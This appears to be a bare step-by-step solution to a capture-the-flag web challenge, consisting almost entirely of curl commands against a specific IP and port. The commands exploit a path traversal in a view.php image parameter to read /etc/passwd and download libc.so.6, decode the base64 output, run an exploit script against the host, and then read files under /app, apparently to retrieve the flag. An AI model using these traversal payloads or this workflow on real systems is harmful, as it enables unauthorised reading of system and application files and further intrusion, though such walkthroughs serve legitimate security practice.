Step 1
 curl -s 'http://94.237.54.116:31205/view.php?image=/../../../../etc/passwd' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d

Step 2

 curl -s 'http://94.237.54.116:31205/view.php?image=/../../../../usr/lib/x86_64-linux-gnu/libc.so.6' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d > ./libc.so.6

Step 3

copy the image to the directory

 python3 exploit.py 94.237.54.116:31205

Step 4

 curl -s 'http://94.237.54.116:31205/view.php?image=/app/test.png' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d

Step 5

curl -s 'http://94.237.54.116:31205/view.php?image=/app/deb756bcdc4a1acd611c34a742c0436ad29202f1496e737e1d76bd025a60140e' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d